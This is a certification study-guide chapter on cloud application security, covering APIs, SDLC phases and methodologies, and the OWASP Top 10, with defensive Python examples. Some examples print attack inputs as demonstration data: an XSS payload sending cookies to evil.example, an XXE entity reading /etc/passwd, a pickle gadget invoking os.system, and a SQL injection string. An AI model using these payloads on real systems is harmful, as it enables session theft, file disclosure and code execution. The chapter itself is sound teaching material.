Chapter 6

Domain 4: Cloud Application Security

IN THIS CHAPTER

Bullet Building awareness for cloud application security

Bullet Exploring the fundamentals of the Software Development Lifecycle (SDLC)

Bullet Examining common SDLC methodologies

Bullet Learning how to apply security throughout the SDLC

Bullet Securely using and integrating third-party software components

Bullet Exploring cloud application architecture

Bullet Learning how to control identity and access management for your applications

In this chapter, you explore the most important application security concerns that exist in cloud environments. I provide an overview of the Secure Software Development Lifecycle process and then move into specific technologies for managing your cloud applications securely and effectively. Domain 4 represents 17 percent of the CCSP certification exam.

Cloud application development is a rapidly growing field thanks to the number of organizations that continue to migrate their applications and data to cloud-based infrastructures. As these migrations happen, it’s up to the well-informed cloud security professional to guide organizations through requirements definition, policy generation, and application development. Although the process of securing cloud-based applications shares many similarities with on-premise solutions, as a CCSP candidate, you must be mindful of techniques and methodologies that are specific to cloud application security.

Advocating Training and Awareness for Application Security

While you may be surprised to see a section on training and awareness in the Cloud Application Security chapter, think for a minute about how critical application development and deployment is in cloud environments and keep in mind the potential impacts associated with insecure code being deployed across a vast cloud infrastructure. As a CCSP candidate, it’s important that you’re familiar with the basics of cloud application development and that you have a strong understanding of common pitfalls and vulnerabilities that exist throughout the Software Development Lifecycle.

Cloud development basics

The key difference between application development in the cloud and in traditional IT models is that cloud development relies heavily on the usage of APIs. While it may sound like a type of beer, an API, or Application Programming Interface, is a software-to-software communication link that allows two applications (like a client and a server) to interact with one another over the Internet. APIs include the set of programming instructions and standards necessary for a client application to interact with some web-based server application to perform actions or retrieve needed information.

Because cloud environments are accessed over the web, CSPs make APIs available to cloud developers to allow them to access, manage, and control cloud resources. Several API formats exist, but the two most commonly used are Simple Object Access Protocol (SOAP) and Representational State Transfer (REST).

SOAP and REST both work across HTTP, and both rely on established rules that their users have agreed to follow — but that’s just about where the similarities end; they are quite different in approach and implementation.

SOAP is a protocol that was designed to ensure that programs built in different languages or platforms could communicate with each other in a structured manner. SOAP encapsulates data in a SOAP envelope and then uses HTTP or other protocols to transmit the encapsulated data. A major limitation of SOAP is that it only allows usage of XML-formatted data. While SOAP was long the standard solution for web service interfaces, today it is typically used to support legacy applications, or where REST is not technically feasible to use.

REST addresses SOAP’s shortcomings as a comparatively complicated, slow, and rigid protocol. REST is not a protocol, but rather a software architectural style applied to web applications. RESTful services most commonly run over HTTP and support data formats such as JSON, XML, or YAML. Part of the convenience behind REST is that RESTful services use standard URLs and HTTP methods (like GET, POST, and DELETE) to manage resources.
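
To make the idea concrete, here’s a minimal sketch of a RESTful interaction using Python’s requests library. The endpoint, resource names, and token are hypothetical; real CSP APIs use their own paths and authentication schemes.

import requests

BASE_URL = "https://api.example-csp.com/v1"            # hypothetical endpoint
HEADERS = {"Authorization": "Bearer <access-token>"}   # placeholder credential

# GET retrieves a resource representation (JSON in this case)
resp = requests.get(f"{BASE_URL}/storage/buckets", headers=HEADERS, timeout=10)
resp.raise_for_status()
buckets = resp.json()

# POST creates a new resource from a JSON payload
new_bucket = {"name": "app-logs", "region": "us-east-1"}
resp = requests.post(f"{BASE_URL}/storage/buckets", json=new_bucket,
                     headers=HEADERS, timeout=10)

# DELETE removes a resource identified by its URL
requests.delete(f"{BASE_URL}/storage/buckets/app-logs", headers=HEADERS, timeout=10)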

Technical stuff Five architectural constraints are required for a system to be considered RESTful: client-server architecture, statelessness, cacheable, layered system, and uniform interface. (A sixth constraint, code on demand, is optional.) These constraints restrict the ways in which clients and servers communicate and ensure the appropriate scalability, performance, and interoperability.

Understanding the basics of APIs is important for every cloud professional and is especially important when preparing for the CCSP exam. Make sure that you understand which types of APIs your cloud provider offers and thoroughly consider any limitations and impact to your organization’s cloud application security.

Common pitfalls

Being able to prepare for, identify, and understand cloud-based application issues is a tremendous skill that every cloud security professional should develop. As a CCSP, it’s your responsibility to help your organization maintain awareness of potential and actual risks when migrating to or developing applications in the cloud. Failure to do so may result in application vulnerabilities that ultimately lead to unsuccessful projects, unnecessary expenses, reputational damage for your company, or worse. The issues I discuss in this section are some of the most common cloud application development pitfalls.

Migration and portability issues

Traditional on-premise systems and applications are designed, implemented, and optimized to run in traditional data centers. These applications have likely not been developed with cloud environments or services in mind, and so when migrating to the cloud, application functionality and security may not be exactly the same as what you’re used to in your on-prem environments. As a cloud security professional, you must assess your on-prem applications with the expectation that they have not been developed to run in the cloud. This expectation helps ensure that proper precautions are taken when designing (or redesigning) application security controls during the migration.

In many instances, on-premise applications are developed in such a way that they depend on very specific security controls as implemented in your organization’s data centers. When these applications are migrated to the cloud, some of these controls may need to be reconfigured or redeveloped to accommodate your new cloud-based solution. Remember that many CSPs offer modern security technologies that are routinely updated to remain cutting-edge. It’s very likely that an application that’s been hosted in a 20-year-old data center infrastructure is not properly configured for a simple lift and shift to the cloud.

Remember Lift and shift is the process of taking applications and workloads from one environment and seamlessly placing them in another, usually cloud-based, environment. It’s important that you be mindful of the fact that not all applications can be lifted and shifted to the cloud due to the many technical interdependencies that exist in on-prem solutions. It’s almost always necessary to modify existing configurations or change the way an application interacts with other applications and systems.

Integration issues

In a traditional IT environment, your organization maintains full control over the entire infrastructure — you have complete access to servers, networking devices, and all other hardware and software in your data center. When moving to a cloud environment, your developers and administrators no longer have this level of control, and in some cases, the difference can be drastic. Performing system and application integrations without full access to all supporting systems and services can be very complicated. Cloud customers are left to rely on the CSP for assistance, which may not only extend integration timelines but also increase project costs. Using the cloud provider’s APIs, where possible, can help minimize integration risk and reduce the overall complexity of development. APIs are a CSP’s way of providing just enough control to the customer to facilitate integration and management of their cloud-based applications.

Cloud environment challenges

When developing cloud-based applications, it is essential that developers and system administrators understand the nuances of cloud environments and the potential pitfalls that these nuances may present during application development. The following list identifies some key factors that organizations should consider before cloud-based application development:

  • The deployment model (public, private, community, or hybrid) being leveraged determines the level of multitenancy and may impact application development considerations related to privacy.
  • The service model (IaaS, PaaS, or SaaS) being leveraged is most often PaaS for pure application development projects, but may also include IaaS deployments. The service model determines how much access to systems, logs, and information your development team has.

The preceding items ultimately come down to considerations around multitenancy, shared responsibility, and customer control/access. It’s important that you consider these factors to avoid common pitfalls, such as lack of required isolation (for example, as required by certain compliance frameworks) and lack of sufficient control over supporting resources. Fully understanding what deployment model and service model your application is being developed for is a critical step toward planning for and addressing potential development challenges in your cloud environment.

Warning Make sure that your development environment matches the production environment that you intend to use! Organizations sometimes use a development environment that has a different deployment model than their production environment — it’s not uncommon to see development being done in a private cloud (or even on-premise) environment before moving to a public cloud infrastructure. Some organizations even use separate CSPs for development and production, often for cost purposes. It’s important to keep in mind that not all CSPs offer the same APIs or functionality, which may cause portability issues if using dissimilar environments for dev and prod.

Insufficient documentation

As a field, application development has evolved over the years into some generally accepted best practices, principles, and methodologies. Mature organizations maintain well-documented policies and procedures that guide their development teams through the SDLC. Following these policies and procedures helps developers efficiently create their applications while minimizing security risks.

As developers move to different environments, like the cloud, some of their tried-and-true methodologies don’t work the way they always have. As such, organizations often find themselves with a lack of thorough documentation focused on secure development in cloud environments. Although many CSPs provide guidance to their customers, documentation often lags their speed of innovation — service updates and new releases may make existing documentation obsolete or incomplete. Ultimately, it’s up to each organization (led by their fearless CCSP) to understand how cloud architectures influence their SDLC and to accurately document policies, procedures, and best practices that take into account the additional concerns and considerations associated with cloud development.

Common cloud vulnerabilities

As discussed throughout this book, cloud environments demonstrate certain essential characteristics (on-demand self-service, resource pooling, broad network access, and so on) that help provide the goodness of cloud computing when properly understood and utilized. Having a firm understanding of these characteristics and the vulnerabilities inherent in cloud computing is critical for developers building cloud-based applications.

The following categories of common cloud vulnerabilities are each associated with one or more of the key cloud computing characteristics I discuss in Chapter 3.

  • Access control vulnerabilities
  • Internet-related vulnerabilities
  • Data storage vulnerabilities
  • Misuse vulnerabilities

The following sections discuss each of these in detail.

Access control vulnerabilities

The cloud characteristic on-demand self-service means that cloud users can access cloud services whenever they need them. This sort of ongoing access makes identity and access management a critical concern for developers. It is essential that applications are developed and implemented with the principle of least privilege in mind, providing each user access to only the resources that she requires to do her job.

In addition to managing users’ roles and access within applications, developers should avoid weak authentication and authorization methods that allow users to bypass built-in security measures, such as least privilege. Developers should enforce strong authentication by requiring periodic re-authentication and multifactor authentication where possible. For even more assurance, developers and cloud architects should consider implementing a Zero Trust architecture, as discussed in Chapter 5.

Another (even scarier) vulnerability is that of unauthorized access to the management plane. Some level of access to a management interface is usually required for cloud users to access their cloud resources. Without proper configuration, this access presents a higher risk in cloud environments than in traditional IT infrastructures with very few management interfaces. Cloud developers and administrators must ensure that management APIs are tightly secured and closely monitored.

Internet-related vulnerabilities

The cloud characteristic broad network access means that cloud resources are accessible by users via a network, using standard network protocols (TCP, IP, and so on). In most cases, the network being used is the Internet, which must always be considered an untrusted network. As such, common Internet-related vulnerabilities like Denial of Service and man-in-the-middle attacks are major considerations in cloud computing. Well-designed systems and applications include controls that detect and prevent the misconfigurations that can lead to these types of vulnerabilities being exploited.

Data storage vulnerabilities

The cloud characteristic resource pooling and the related term multitenancy mean that the data of one cloud customer is likely to share resources with another, unrelated cloud customer. Although CSPs generally have strong logical separation between tenants and their data, the very nature of sharing physical machines presents some level of risk to cloud customers. In many cases, legal or regulatory requirements can be satisfied only by demonstrating appropriate separation between tenants’ data. Developers can help enforce logical separation between tenants by encrypting data at rest (and in transit) using strong encryption algorithms. Where encryption is not possible, developers should explore data masking and other obfuscation techniques.
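
As a simple illustration of encrypting sensitive data before it lands in shared storage, here’s a minimal sketch using the Python cryptography package’s Fernet recipe (AES-based authenticated encryption). The record is hypothetical, and real deployments would pull the key from a key management service rather than generating it alongside the data.

from cryptography.fernet import Fernet

# In practice, the key comes from a key management service, not from code
# sitting next to the data it protects.
key = Fernet.generate_key()
fernet = Fernet(key)

record = b'{"customer_id": 42, "ssn": "000-00-0000"}'  # hypothetical sensitive record

ciphertext = fernet.encrypt(record)      # store this in the shared data store
plaintext = fernet.decrypt(ciphertext)   # decrypt only after authorization checks
assert plaintext == record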

The cloud characteristic of rapid elasticity means that systems scale up and down as necessary to support changing customer demand. In order to provide this functionality, CSPs build large, geographically dispersed infrastructures that support users where they are. With this dispersion comes another legal and compliance vulnerability related to data location. While some cloud providers allow you to restrict your data to certain geographic locations, most CSPs do not currently provide this ability for all their services. When certain regulations require that data remains in specific regions, developers must ensure that their applications store and process regulated data only in compliant cloud services.

Misuse vulnerabilities

The cloud characteristic measured service means that you pay for what you use — nothing more and nothing less. Where this approach can go wrong is when system and application vulnerabilities allow unauthorized parties to misuse cloud resources and run up the bill. An example is cryptojacking, which is a form of malware that steals computing resources and uses them to mine Bitcoin or other cryptocurrencies. Proper monitoring should be built into all systems and applications to detect cloud misuse as soon as possible.

Describing the Secure Software Development Lifecycle (SDLC) Process

Streamlined and secure application development requires a consistent methodology and a well-defined process of getting from concept to finished product. The SDLC is the series of steps followed to build, modify, and maintain computing software.

Business requirements

Your organization’s business requirements should be a key consideration whenever you develop new software or even when you modify existing applications. You should make sure that you have a firm understanding of your organization’s goals (overall and specific to your project) and knowledge of the end-user’s needs and expectations.

It’s important to gather input from as many stakeholders as possible as early as possible to support the success of your application. Gathering requirements from relevant leaders and business units across your organization is crucial to ensuring that you don’t waste development cycles on applications or features that don’t meet the needs of your business.

These business requirements are a critical input into the SDLC.

Phases

While the SDLC process has multiple different variations, it most commonly includes the steps, or phases, in Figure 6-1:

  • Planning
  • Defining
  • Designing
  • Developing
  • Testing
  • Deploying and maintaining

FIGURE 6-1: Software Development Lifecycle overview.

Tip There’s a good chance that you will see at least one question related to the SDLC on your exam. Remember that the titles of each phase may vary slightly from one methodology to the next, but make sure that you have a strong understanding of the overall flow and the order of operations.

Remember Although none of the stages specifically reference security, it is important that you consider security at each and every step of the SDLC process. Waiting until later stages of the process can introduce unnecessary security risks, which can add unforeseen costs and extend your project timeline.

Planning

The Planning phase is the most fundamental stage of the SDLC and is sometimes called Requirements Gathering. During this initial phase, the project scope is established and high-level requirements are gathered to support the remaining lifecycle phases. The project team should work with senior leadership and all project stakeholders to create the overall project timeline and identify project costs and resources required.

During the Planning phase, you must consider all requirements and desired features and conduct a cost-benefit analysis to determine the potential financial impact versus the proposed value to the end-user. Using all the information that you gather during this phase, you should then validate the economic and technical feasibility of proceeding with the project.

The Planning phase is where risks should initially be identified. Your project team should consider what may go wrong and how you can mitigate, or lower, the impact of those risks. For example, imagine that you’re building an online banking application. As part of the Planning phase, you should not only consider all functional requirements of such an application, but also security and compliance requirements, such as satisfying PCI DSS. Consider what risks currently exist within your organization (or your cloud environment) that might get in the way of demonstrating PCI DSS compliance and then plan ways to address those risks.

Defining

You may also see this phase referred to as Requirements Analysis. During the Defining phase, you use all the business requirements, feasibility studies, and stakeholder input from the Planning phase to document clearly defined product requirements. Your product requirements should provide full details of the specific features and functionality of your proposed application. These requirements will ultimately feed your design decisions, so they need to be as thorough as possible.

In addition, during this phase you must define the specific hardware and software requirements for your development team — identify what type of dev environment is needed, designate your programming language, and define all technical resources needed to complete the project.

Tip This phase is where you should specifically define all your application security requirements and identify the tools and resources necessary to develop those accordingly. You should be thinking about where encryption is required, what type of access control features are needed, and what requirements you have for maintaining your code’s integrity.

Designing

The Designing phase is where you take your product requirements and software specifications and turn them into an actual design plan, often called a design specification document. This design plan is then used during the next phase to guide the actual development and implementation of your application.

During the Designing phase, your developers, systems architects, and other technical staff create the high-level system and software design to meet each identified requirement. Your mission during this phase is to design the overall software architecture and create a plan that identifies the technical details of your application’s design. In cloud development, this phase includes defining the required number of CPU cores, amount of RAM, and bandwidth, while also identifying which cloud services are required for full functionality of your application. This component is critical because it may identify a need for your organization to provision additional cloud resources. Your design should define all software components that need to be created, interconnections with third-party systems, the front-end user interface, and all data flows (both within the application and between users and the application).

At this stage of the SDLC, you should also conduct threat modeling exercises and integrate your risk mitigation decisions (from the Planning phase) into your formal designs. In other words, you want to fully identify potential risks and design your application to address them. I cover threat modeling in the aptly titled “Threat modeling” section later in this chapter.

Developing

Software developers, rejoice! After weeks or even months of project planning, you can finally write some code! During this phase of the SDLC, your development team breaks up the work documented in previous steps into pieces (or modules) that are coded individually. Database developers create the required data storage architecture, front-end developers create the interface that users will interact with, and back-end developers code all the behind-the-scenes inner-workings of the application. This phase is typically the longest of the SDLC, but if the previous steps are followed carefully, it can be the least complicated part of the whole process.

During this phase, developers should conduct peer reviews of each other’s code to check for flaws, and each individual module should be unit tested to verify its functionality prior to being rolled into the larger project. Some development teams skip this part and struggle mightily to debug flaws once an application is completed.

In addition to conducting functional testing of each module, the time is right to begin security testing. Your organization should conduct static code analysis and security scanning of each module before integration into the project. Failure to do so may allow individual software vulnerabilities to get lost in the overall codebase, and multiple individual security flaws may combine to present a larger aggregate risk, or combined risk.

Testing

Once the code is fully developed, the application enters the Testing phase. During this phase, application testers seek to verify whether the application functions as desired and according to the documented requirements; the ultimate goal here is to uncover all flaws within the application and report those flaws to the developers for patching. This cyclical process continues until all product requirements have been validated and all flaws have been fixed.

With a completed application in hand, security testers have more tools at their disposal to uncover security flaws. Instead of relying solely on static code analysis, testers can use dynamic analysis to identify flaws that occur only when the code is executed. Static analysis and dynamic analysis are further discussed in the “Security testing methodologies” section of this chapter.

Tip The Testing phase is one of the most crucial phases of the SDLC, as it is the main gate between your development team and customers. Testing should be conducted in accordance with an application testing plan that identifies what and how to test. Management and relevant stakeholders should carefully review and approve your testing plan before testing begins.

Deploying and maintaining

Once the application has passed the Testing phase, it is ready to be deployed for customer use. There are often multiple stages of deployment (Alpha, Beta, and General Availability are common ones), each with its own breadth of deployment (for example, alpha releases tend to be deployed to select customers, whereas general availability means it’s ready for everyone).

Once applications have been tested and successfully deployed, they enter a maintenance phase where they’re continually monitored and updated. During the Maintaining phase, the production software undergoes an ongoing cycle of the SDLC process, where security patches and other updates go through the same planning, defining, designing, developing, testing, and deploying activities discussed in the preceding sections.

Many SDLC models include a separate phase for disposal or termination, which happens when an application is no longer needed or supported. From a security perspective, you should keep in mind that data (including portions of applications) may remain in cloud environments even after deletion. Consult your contracts and SLAs for commitments that your CSP makes for data deletion and check out Chapter 4 for more on secure data deletion.

Methodologies

Although the steps within the SDLC remain largely constant, several SDLC methodologies, or models, exist, and each approaches these steps in slightly different ways. Two of the most commonly referenced and used methodologies are waterfall and agile.

Waterfall

Waterfall is the oldest and most straightforward SDLC methodology. In this model, you complete one phase and then continue on to the next — you move in sequential order, flowing through every step of the cycle from beginning to end. Each phase of this model relies on successful completion of the previous phase; there’s no going back, because… well, because waterfalls don’t flow up.

Some advantages of the waterfall methodology include

  • It’s simple to manage and easy to follow.
  • Tracking and measuring progress is easy because you have a clearly defined end state early on.
  • The measure twice, cut once approach allows applications to be developed based upon a more complete understanding of all requirements and deliverables from the start.
  • The process can largely occur without customer intervention after requirements are initially gathered. Customers and developers agree on desired outcomes early in the project.

Some challenges that come with waterfall include

  • It’s rigid. Requirements must be fully developed early in the process and are difficult to change once the design has been completed.
  • Products may take longer to deliver compared to more iterative models, like agile (see the next section).
  • It relies very little on the customer or end-user, which may make some customers feel left out.
  • Testing is delayed until late in the process, which may allow small issues to build up into larger ones before they’re detected.

Agile

Agile is more of the new kid on the block, having been introduced in the 1990s. In this model, instead of proceeding in a linear and sequential fashion, development and testing activities occur simultaneously and cyclically.

Application development is separated into sprints that produce a succession of releases that each improves upon the previous release. With the agile model, the goal is to move quickly and to fail fast — create your first release, test it, fix it, and create your next release fast!

Some advantages of the agile methodology include

  • It’s flexible. You can move from one phase to the next without worrying that the previous phase isn’t perfect or complete.
  • Time to market is much quicker than waterfall.
  • It’s very user-focused; the customer has frequent opportunities to give feedback on the application.
  • Risks may be reduced because the iterative nature of agile allows you to get feedback and conduct testing early and often.

Some challenges that come with Agile include

  • It can be challenging to apply in real-life projects, especially larger projects with many stakeholders and components.
  • The product end-state is less predictable than waterfall. With agile, you iterate until you’re happy with the result.
  • It requires a very high level of collaboration and frequent communication between developers, customers, and other stakeholders. This challenge can be a pro, but sometimes has a negative impact on developers and project timelines.

Applying the SDLC Process

Applying the SDLC to your cloud application development requires an understanding of common application vulnerabilities, cloud-specific risks, and the use of threat modeling to assess the impact of those risks. This section guides you through securely applying the SDLC process to your cloud development initiatives.

Common vulnerabilities during development

The Open Web Application Security Project (OWASP) is an online community with a wealth of helpful projects and resources. I cover some of its helpful logging-related resources in Chapter 4, but one of the most famous projects is OWASP Top 10, which identifies the most critical security risks to web applications. This list is particularly relevant to cloud applications, which are inherently web-based.

As of this writing, OWASP Top 10 was last updated in 2017. The top ten web application security risks outlined by OWASP are

  • Injection
  • Broken authentication
  • Sensitive data exposure
  • XML external entities (XXE)
  • Broken access control
  • Security misconfiguration
  • Cross-site scripting (XSS)
  • Insecure deserialization
  • Using components with known vulnerabilities
  • Insufficient logging and monitoring

The following sections describe these risks in detail.

Injection

Injection attacks refer to a broad class of attacks in which a malicious actor sends untrusted commands or input to an application. Vulnerable applications process the untrusted input as part of a valid command or query, which then alters the course of the application’s execution. In doing so, injection attacks can give an attacker control over an application’s program flow, grant an attacker unauthorized access to data, or even allow full system compromise. It’s no wonder that this type of vulnerability ranks at the top of the OWASP Top 10.

Common injection attacks include SQL injection, code injection, and cross-site scripting, discussed later in this chapter. These attacks are not only dangerous, but also very widespread. Many freely available tools make exploiting these common vulnerabilities simple, even for inexperienced hackers.

Applications can be protected against injection attacks by restricting privileges for high-risk actions and by performing input validation. Input validation is the process of ensuring that all input fields are properly checked and approved by the application prior to processing the input. Input validation requires locking down your application code to allow only expected input types and values and filtering any suspicious or untrusted inputs.
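
The sketch below shows two of these defenses side by side: an allow-list check on the input and a parameterized query, so user input is never concatenated into the SQL statement. The table and column names are hypothetical.

import re
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE accounts (username TEXT, balance REAL)")

def get_balance(username):
    # Allow-list validation: accept only expected characters and lengths
    if not re.fullmatch(r"[A-Za-z0-9_]{3,30}", username):
        raise ValueError("invalid username")

    # Parameterized query: the driver treats the value as data, never as SQL
    row = conn.execute(
        "SELECT balance FROM accounts WHERE username = ?", (username,)
    ).fetchone()
    return row[0] if row else None

# A classic injection attempt is rejected before it ever reaches the database:
# get_balance("alice' OR '1'='1")  # raises ValueError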

Broken authentication

Broken authentication is a vulnerability that allows an attacker to capture or bypass an application’s authentication mechanisms, allowing the attacker to assume the identity of the attacked user, thus granting the attacker the same privileges as that user.

Broken authentication can occur in several ways. It can be as obvious as an application allowing weak passwords that are easily guessed or as obscure as an application not terminating an authenticated session when a browser is closed. In the latter example, imagine that you’re using a public computer to check your bank account (generally not advised, but bear with me). Instead of clicking the “Sign out” button, you simply close your browser. If the banking site is not programmed to timeout upon browser closure, then the next user of that machine could potentially open the same browser and still be authenticated to your account.

Developers can do a few things to protect applications from broken authentication. Some recommendations include

  • Enforce multifactor authentication, wherever possible, and enforce password length and complexity everywhere else.
  • Implement a session timeout for sessions that have been inactive longer than a predetermined amount of time.
  • Monitor for and deter brute force login attempts by disabling accounts after an organization-determined number of failed logins (five is a common number, but you should check your compliance obligations as well).
  • Use TLS (still widely referred to as SSL) to encrypt data in transit, wherever possible.
  • Properly encrypt and/or hide session IDs and session tokens. Do not place session IDs in URLs because users often share links.
  • Consider using a web application firewall (WAF). WAFs filter all traffic into your web application and can also support multifactor authentication. Many CSPs now offer built-in WAF services, though some come at an additional cost.
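
A minimal sketch of two of the preceding recommendations (an idle-session timeout and account lockout after repeated failures) follows. The thresholds are illustrative, and real applications typically rely on their framework’s session middleware rather than hand-rolled logic.

import time

IDLE_TIMEOUT_SECONDS = 15 * 60   # expire sessions idle longer than 15 minutes
MAX_FAILED_LOGINS = 5            # lock the account after five consecutive failures

sessions = {}        # session_id -> last activity timestamp
failed_logins = {}   # username -> consecutive failure count

def is_session_valid(session_id):
    last_seen = sessions.get(session_id)
    if last_seen is None or time.time() - last_seen > IDLE_TIMEOUT_SECONDS:
        sessions.pop(session_id, None)   # treat stale sessions as logged out
        return False
    sessions[session_id] = time.time()   # refresh on legitimate activity
    return True

def record_login_attempt(username, succeeded):
    if succeeded:
        failed_logins[username] = 0
        return True
    failed_logins[username] = failed_logins.get(username, 0) + 1
    if failed_logins[username] >= MAX_FAILED_LOGINS:
        disable_account(username)        # hypothetical helper that locks the account
    return False

def disable_account(username):
    print(f"Account {username} disabled pending review")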

Sensitive data exposure

Sensitive data exposure is exactly what it sounds like. Many web applications collect, store, and use sensitive user information — data like user credentials, PII, and credit card data. Some of these web applications do not properly secure this sensitive information, which can lead to exposure to unauthorized parties.

Many of the data protection principles you learn about throughout this book apply here. Web applications should enforce encryption at rest and in transit, especially where sensitive data exists. Applications should also check for and enforce secure communications methods when exchanging sensitive data with browsers.

XML External Entities (XXE)

An XML External Entity (XXE) attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. The deep technical details of XXE are outside the scope of this book, but you should understand that XXE attacks may lead to data theft, port scanning, Denial of Service, and more.

Tip The best way to prevent XXE attacks is to disable document type definitions (DTDs), an XML-specific feature. For more information on XXE and its preventions, visit https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A4-XML_External_Entities_(XXE).
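
One way to apply this advice in Python is the third-party defusedxml package, which refuses to expand entity declarations by default. The sketch below assumes that package is installed; the XML payload is a standard demonstration pattern.

from defusedxml.ElementTree import fromstring
from defusedxml import EntitiesForbidden

malicious = """<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<order><item>&xxe;</item></order>"""

try:
    fromstring(malicious)
except EntitiesForbidden:
    # The parser rejects the document instead of resolving the external entity
    print("Rejected XML containing an entity declaration")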

Broken access control

I introduce access control in Chapter 3, and you learn about it in detail throughout this book. In short, access control is the set of policies and mechanisms that ensures users aren’t able to act outside of their intended permissions. Broken access control is, of course, failure of access control mechanisms to properly limit or control access to resources. Broken access control includes things like unauthorized privilege escalation, bypassing access controls by modifying the URL or other settings, and manipulating metadata to gain unauthorized access.

Prevention of broken access control begins during the Testing phase, but continues well into the Maintaining phase. Static and dynamic analysis techniques can help identify weak access control mechanisms, but security teams should also conduct penetration tests on systems that process sensitive information. In addition, enforcing a deny by default policy, validating application inputs, and performing periodic checks of a user’s privilege can all help mitigate risks associated with broken access control. Finally, do not forget that detection is just as important as prevention; you must log and continually monitor access to your application to enable quick detection and remediation of broken access control.
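
A deny-by-default check can be as simple as the sketch below: access is granted only when an explicit permission exists for the user’s role, and everything else falls through to a refusal. The role and permission names are hypothetical.

# Explicit allow-list of role -> permitted actions; anything absent is denied
PERMISSIONS = {
    "customer": {"view_own_account", "transfer_funds"},
    "teller": {"view_own_account", "view_customer_account"},
    "admin": {"view_own_account", "view_customer_account", "modify_limits"},
}

def is_authorized(role, action):
    # Deny by default: unknown roles and unlisted actions are both refused
    return action in PERMISSIONS.get(role, set())

assert is_authorized("teller", "view_customer_account")
assert not is_authorized("customer", "modify_limits")
assert not is_authorized("guest", "view_own_account")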

Security misconfiguration

Security misconfiguration is pretty straightforward; it’s when systems or applications are not properly or securely configured. Examples of security misconfiguration include

  • Use of default credentials (for example, admin:admin)
  • Use of insecure default configurations (for example, leaving firewalls in a default allow configuration)
  • Unpatched or outdated systems
  • Error messages that share too much information (for example, your application should never say “wrong username” or “incorrect password,” because this phrasing gives attackers a clue as to which might be right or wrong — login failures should be reported as “incorrect username/password” or similar)

Preventing security misconfiguration starts with the unit testing that you conduct in the Developing phase and continues through testing and into the Maintaining phase. It’s essential that you have strong configuration management practices in place to monitor and manage configurations across all your systems and applications.

Cross-site scripting (XSS)

Cross-site scripting, or XSS, is a specific variant of injection attacks that targets web applications. XSS enables an attacker to inject untrusted code (like a malicious script) into a web page or application. When an unsuspecting user navigates to the infected web page, the untrusted code is then executed in the user’s browser using their permissions. XSS acts as a vehicle for an attacker to deliver malicious code to anyone who navigates to the infected application. The infected code can manipulate the output of the original website, redirect the user to a malicious site, give the attacker control over the user’s web session, or even leverage the browser’s permissions to access information on the user’s local machine. As you can imagine, the potential damage caused by an XSS vulnerability is huge, and it remains one of the top security concerns for cloud developers.

As with the rest of the family of injection attacks, cross-site scripting is primarily protected by input validation and sanitization. As a cloud security professional, make sure that your applications check all input for malicious code.
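In addition to validating input, applications should escape untrusted data before rendering it in a page. Python’s standard library provides html.escape for exactly this purpose; most web frameworks perform equivalent escaping automatically in their template engines. A minimal illustration:

import html

user_comment = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Escaping converts markup characters to harmless entities before rendering
safe_comment = html.escape(user_comment)
print(safe_comment)
# &lt;script&gt;document.location=&quot;https://evil.example/?c=&quot;+document.cookie&lt;/script&gt;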

Insecure deserialization

Technical stuff Jargon alert! Jargon alert! In computer science, serialization is the process of breaking down an object (like a file) into a stream of bytes (0s and 1s) for storage or transmission. Deserialization is, of course, the inverse operation of reconstructing a series of bytes into its original format.

Insecure deserialization occurs when an application or API takes an untrusted stream of bytes and reconstructs it into a potentially malicious file. One of the ways that malware masks itself is by breaking itself down to avoid signature detection and then relying on some later process to reconstruct it. Insecure deserialization can be used to perform a wide array of attacks and can also lead to remote code execution.

Developers should ensure that applications and APIs accept only serialized data from trusted sources, if at all.
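
The contrast below illustrates the point: deserializing untrusted bytes with Python’s pickle module can execute arbitrary code, whereas a constrained format like JSON only reconstructs plain data. The payload shown is a standard demonstration pattern, not an exploit against any particular application.

import json
import pickle

# Unsafe: pickle will happily run code embedded in the byte stream
class Innocent:
    def __reduce__(self):
        import os
        return (os.system, ("echo arbitrary command executed",))

untrusted_bytes = pickle.dumps(Innocent())
# pickle.loads(untrusted_bytes)  # would execute the embedded command

# Safer: JSON can only produce dicts, lists, strings, numbers, and booleans
untrusted_text = '{"user": "alice", "role": "admin"}'
data = json.loads(untrusted_text)
print(data["user"])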

Using components with known vulnerabilities

This vulnerability occurs when your application is built on one or more vulnerable frameworks, modules, libraries, or other software components. While each component may have limited privileges on its own, the potential risk increases once it is integrated into your application. Using components with known vulnerabilities may indirectly impact other parts of your application and may even compromise sensitive data.

The best protection from this vulnerability is vigilant updating and patching of all components within your application. Your application is only as secure as its weakest link; failing to patch one component’s security flaws makes your entire application vulnerable to attack.

Insufficient logging and monitoring

Insufficient logging exists when systems and applications fail to capture, maintain, and protect all auditable events. Events that should be logged include privileged access, login failures, and other events I discuss in Chapters 4 and 5. The auditable events must be captured in logs and stored in a system separate from the system being audited to ensure that the logs are not compromised if the system itself is compromised. Also, be sure to maintain log data in accordance with any regulatory and contractual requirements.
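
A minimal sketch of shipping auditable events to a separate collector follows, using Python’s standard logging module with a syslog handler. The collector address is a placeholder; production systems more commonly use a log-forwarding agent or the CSP’s native logging service.

import logging
import logging.handlers

audit_logger = logging.getLogger("app.audit")
audit_logger.setLevel(logging.INFO)

# Send audit events to a remote collector so they survive a compromise of this host
remote_handler = logging.handlers.SysLogHandler(address=("logs.internal.example", 514))
remote_handler.setFormatter(logging.Formatter("%(asctime)s %(name)s %(message)s"))
audit_logger.addHandler(remote_handler)

def log_login_failure(username, source_ip):
    audit_logger.info("login_failure user=%s src=%s", username, source_ip)

def log_privileged_action(username, action):
    audit_logger.info("privileged_action user=%s action=%s", username, action)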

Insufficient monitoring occurs when logged events are not sufficiently monitored or integrated into incident response activities. This vulnerability may allow attackers to maintain persistence, pivot to other systems, and cause additional harm that may be prevented with early detection. The best prevention against insufficient monitoring is to develop and maintain a comprehensive strategy for monitoring logs and taking action on important security events.

Cloud-specific risks

You probably realize that a great deal of overlap occurs between application security in the cloud and application security in traditional data center environments. Despite the similarities, it’s important that you take note of the nature of cloud computing and how cloud architectures contribute to a unique risk landscape. The Cloud Security Alliance (CSA) routinely publishes a fantastic guide that outlines the top risks in cloud environments. I cover CSA’s 2019 “Egregious Eleven” in Chapter 3.

